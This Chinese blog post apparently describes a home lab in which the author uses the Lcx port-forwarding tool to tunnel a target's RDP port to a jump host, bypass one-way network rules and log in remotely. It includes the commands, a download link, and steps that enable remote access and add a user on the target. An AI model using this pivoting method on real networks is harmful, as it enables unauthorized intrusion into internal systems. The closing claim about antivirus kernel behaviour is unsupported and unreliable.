最近写了一个简单的威胁分析专家系统Gui图形界面工具,可以快速判断失陷主机,给出失陷隶属度,非常人性化,压缩包大小有20M。实际上,这个小工具可以帮助一线驻场人员,快速定位高危主机,并给所有主机进行威胁排名,指导现场进行威胁处置。采用多维度的打分算法,是整个系统的关键,也花了一点时间来调参。看着自己的小工具,还是蛮有成就感的,我准备明年写一点小游戏,这样大家都能体验我的开发成果~
实际上关于Lcx的文章非常多,但是却没有一个人告诉你Lcx在哪里下载,为什么呢?因为Lcx腾讯管家等主流杀毒软件会报告是病毒,虽然这个误报,但是主流厂商都报,后来者只好跟着报了,Lcx就是为了端口转发的。通过Lcx可以解决数据流的单边问题,比如公司内网可以访问外网,但是外网不可以访问内网,通过Lcx就可以实现从外网访问内网,打破单边网络实现对内网的控制。
Lcx的Github下载地址如下,实际上网上有很多不同版本,但是Github上的是最安全的。
https://github.com/UndefinedIdentifier/LCX
步骤一:在目标机器上执行反射操作,反射到跳板机
Lcx.exe -slave 192.168.160.139 4444 127.0.0.1 3389
步骤二:在跳板机上接收,即将3389端口映射成5555端口
Lcx.exe -listen 4444 5555
步骤三:在跳板机上通过5555端口建立到目标机器上的远程连接
步骤四:见证奇迹,真的不容易,进程不稳定
- 终于成功啦~
- 多了一个用户登陆了(AILX00-Win7ailx00)
- 图中的第三个就是啦~
- 远程登陆到非域账号的ailx00账户~
- 桌面干干净净的啥也没有~
有的人感觉很简单,实际上看起来简单,实战的时候,就会感觉时间流逝的飞快。其中冷暖,实验自知,我大概经历了10多次的失败尝试,终于爽了一把,转眼一看,已经12点半了,还好是周末,赶紧睡觉,身体要紧~
- 登陆域账号的时候,各种出错
- 登陆非域账号的时候,出现这个是正常的,也预示着实验的成功
- 由于我的靶机的远程没有开放,导致没有成功
- 在计算机属性里面配置一下,允许远程连接
- 虽然这个操作较不安全,但是作为试验演示是一个很不错的方法
- 由于刚刚开始不知道里面有一个ailx00非域账号,所以添加了一个新的用户ailx0001
- 因为不是域账号,所以登陆的时候,需要使用计算机名代替域名
- 这里需要注意一样,很容易搞错
- 爽了一把之后
- 当我再次准备实验的时候
- 发现在目标机器上的Lcx已经被删除了
- 是腾讯干的
- 就算我关闭了腾讯电脑管家
- 它还是悄悄的把我文件删了
- 腾讯其实偷偷在内核态运行
本篇完。